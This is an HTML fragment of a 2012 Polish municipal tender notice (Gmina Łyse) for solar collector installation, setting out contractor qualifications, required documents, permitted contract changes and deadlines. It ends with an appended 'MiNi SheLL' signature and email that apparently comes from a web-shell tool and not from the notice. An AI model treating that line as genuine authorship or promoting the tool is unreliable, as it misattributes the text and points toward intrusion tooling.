Zamawiający dokona oceny spełnienia warunków wymaganych od Wykonawców wg formuły: spełnia/nie spełnia na podstawie złożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek, jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia, działalności jest krótszy - w tym okresie: wykonał co najmniej trzy roboty budowlane polegających na budowie instalacji solarnych lub instalacji sanitarnych o łącznej wartości minimum 3 000 000 zł brutto. 
Zamawiający dokona oceny spełnienia warunków wymaganych od Wykonawców wg formuły: spełnia/nie spełnia na podstawie wykazu robót budowlanych - wzór załącznik nr 6 do SIWZ, z załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu - wzór zał. nr 3 do SIWZ (oryginał) 
Zamawiający dokona oceny spełnienia warunków wymaganych od Wykonawców wg formuły: spełnia/nie spełnia na podstawie złożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek, jeżeli wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia: 
a) kierownik budowy posiadający: co najmniej 5 letnie doświadczenie na stanowisku kierownika budowy oraz uprawnienia bez ograniczeń do kierowania robotami w specjalności konstrukcyjno-budowlanej lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, 
b) kierownik robót sanitarnych posiadający: uprawnienia bez ograniczeń do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: cieplnych, wentylacyjnych i gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, 
c) kierownik robót elektrycznych posiadający: uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów.
W przypadku Wykonawców posiadających siedzibę poza granicami RP, Zamawiający dopuszcza przedstawienie osób posiadających równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12 a Ustawy z dnia 7 lipca 1994 r. Prawo Budowlane, z uwzględnieniem postanowień Ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. 
Zamawiający dokona oceny spełnienia warunków wymaganych od Wykonawców wg formuły: spełnia/nie spełnia na podstawie oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia budowlane - wzór załącznik nr 9 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek jeżeli wykaże, że posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 3 000 000 zł. 
Zamawiający dokona oceny spełnienia warunków wymaganych od Wykonawców wg formuły: spełnia/nie spełnia na podstawie złożonych dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>sprawozdanie z badań wg normy PN-EN 12975-2 wykonane przez akredytowane laboratorium badawcze oraz certyfikat wydany przez akredytowaną jednostkę certyfikującą na pełną zgodność z normą: PN-EN 12975-1 według metodyki PN-EN 12975-2 lub europejski certyfikat na znak SOLAR KEYMARK nadany przez jednostkę certyfikującą, lub inny równoważny dokument potwierdzający równoważność jakościową oferowanych kolektorów słonecznych. 
Zamawiający wymaga aby certyfikat równoważny do opisanych powyżej potwierdzał, że:
- do badań losowo pobierane były urządzenia z linii produkcyjnej w zakładzie producenta
- prawidłowość zaświadczenia weryfikowana jest poprzez losowe pobieranie urządzeń do badań na zgodność z normą przez cały okres obowiązywania zaświadczenia. 
W przypadku polskich jednostek certyfikujących należy także przedstawić dokumenty, że jednostka uzyskała akredytację Polskiego Centrum Akredytacji (PCA) i została uznana przez Ministerstwo Gospodarki - (aktualny certyfikat akredytacji zgodnie z Dz.U. z 2010 r. Nr 138, poz.935 ze zmianami art.16 pkt 1,2).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany umowy. Wszystkie ewentualne zmiany umowy wymagają formy pisemnej pod rygorem nieważności i będą dopuszczalne w granicach unormowania art. 144 ust. 1 ustawy Prawo zamówień publicznych.
Zamawiający dopuszcza możliwość zmiany umowy w następującym zakresie: 
1) Zmiana wysokości podatku VAT. 
- warunkiem zmiany będzie ewentualna zmiana ustawowych stawek podatku VAT w okresie realizacji i rozliczania zadania w odniesieniu do objętego umową przedmiotu zamówienia.

2) Zmiana dat i terminów wypełnienia zobowiązań
- warunkiem zmiany będzie wystąpienie przynajmniej jednej z niżej wymienionych okoliczności:
A.  Działanie siły wyższej
a) pod pojęciem siły wyższej rozumie się wszystkie wydarzenia, których nie mogła 
przewidzieć żadna ze stron w dniu podpisania umowy, występujące po tej dacie, nie 
dające się uniknąć i pozostające poza kontrolą obydwu stron. Przypadkami siły 
wyższej są np. powódź, trzęsienie ziemi, pożar, wybuch, wojna, itp.
b) za siłę wyższą nie uważa się braku środków Wykonawcy na realizację przedmiotu umowy, jak również nie wywiązanie się z umów przez kontrahentów Wykonawcy, 
c) strona umowy chcąca zgłosić roszczenia wynikające z siły wyższej na obowiązek niezwłocznie powiadomić na piśmie drugą stronę o jej wystąpieniu i zakończeniu, 
d) strona zgłaszająca roszczenia musi udowodnić drugiej stronie wystąpienie siły 
wyższej za pomocą dokumentów wydanych przez odpowiednie, uprawnione do tego instytucje,

B. Wystąpienie zamówień dodatkowych, niemożliwych do przewidzenia przed zawarciem umowy, powodujących w konsekwencji potrzebę zmiany terminu wykonania zamówienia. 

C.  Zmiana umowy z uwagi na zmianę (alternatywnie: podwykonawcy lub innych) osób 
uczestniczących w wykonaniu zamówienia. 

D. Problemy z terminowym wykonaniem zamówienia ze względu na problemy z dostępem do budynków, w których wykonane mają być roboty.
 
E.  Zmiany kwoty środków finansowych, przeznaczonych na wykonanie przedmiotowego zamówienia, dokonanej przez uprawniony organ, z której wynika konieczność zmiany harmonogramu rzeczowo-finansowego.

3) Zmiany miejsca montażu instalacji solarnych. 
- warunkiem zmiany będzie jedna z następujących okoliczności:
A. gdy w trakcie wykonywania przedmiotu zamówienia, ujawni się brak technicznych 
warunków do dokonania stosownego montażu, 
B. gdy ze względu na decyzję osób trzecich, których zgoda jest niezbędna do dokonania 
montażu, nie będzie możliwy montaż we wskazanej lokalizacji. 

4) Zamawiający dopuszcza możliwość wystąpienia w trakcie realizacji przedmiotu umowy konieczności wykonania robót zamiennych w stosunku do przewidzianych dokumentacja projektową. 
- warunkiem zmiany będzie:
A. konieczność wykonania robót zamiennych do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami wraz potwierdzeniem tego faktu przez projektanta, inspektora nadzoru inwestorskiego oraz zatwierdzenie robót przez Zamawiającego lub
B. konieczność wykonania robót zamiennych w celu osiągnięcia zakładanych wskaźników projektu wynikających z dofinansowania z Regionalnego Programu Operacyjnego Województwa Mazowieckiego.
Powyższa zmiana nie może prowadzić do podwyższenia łącznej ceny wykonania przedmiotu umowy w stosunku do ceny ofertowej.

5) Treść umowy o udzielenie zamówienia publicznego może podlegać zmianie w przypadku zmian umowy o dofinansowanie projektu zawartej przez Zamawiającego lub wytycznych dotyczących realizacji projektu. Zakres ewentualnych zmian musi ściśle wynikać (wiązać się) ze zmianą umowy o dofinansowanie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminalyse.pl   oraz bip.gminalyse.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy
ul. Ostrołęcka 2
07-437 Łyse
pok. nr 15
tel. 29 77 25 003, 
fax. 29 77 25 027 wew. 41.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2012 godzina 10:00, miejsce: Urząd Gminy
ul. Ostrołęcka 2
07-437 Łyse
1 piętro, pok. nr 22 - sekretariat
tel. 29 77 25 003, 
fax. 29 77 25 027 wew. 41.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie stanowi kluczową część Projektu pn. Wykorzystanie odnawialnych źródeł energii na Kurpiowszczyźnie poprzez kompleksowy montaż kolektorów słonecznych w gminach: Łyse i Baranowo współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach Priorytetu IV - Środowisko, zapobieganie zagrożeniom i energetyka, Działania 4.3 - Ochrona powietrza, energetyka - Regionalnego Programu Operacyjnego Województwa Mazowieckiego na lata 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com